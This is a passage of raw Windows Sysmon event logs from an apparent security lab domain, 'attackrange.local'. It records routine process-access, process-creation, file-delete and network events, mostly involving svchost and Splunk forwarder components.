08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.098{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72E-60EB-C17D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.095{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.095{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.095{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.095{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72E-60EB-C17D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:54.095{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.079{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72E-60EB-C17D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.080{466BC892-F72E-60EB-C17D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:55.831{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF46C0A6EC4D325783B57D9AC7F0939F,SHA256=5C2F394028778D267FFC9C5603CD6D1F68A76B0808531E707BFB50222061212C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:54.180{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57401-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:55.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6689C3BB82E7248A15FC47A0102DBD,SHA256=CA026183C912E55EF06E8DAF3679C950B093A8D6EC312477468911C068169B3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:55.098{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD02417E2EB4B3A94603B064FB4C358D,SHA256=43718E65E5A8F47664FB0DDEB955BFBD08939DF35079D700E2E675623EFD7C95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:56.845{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 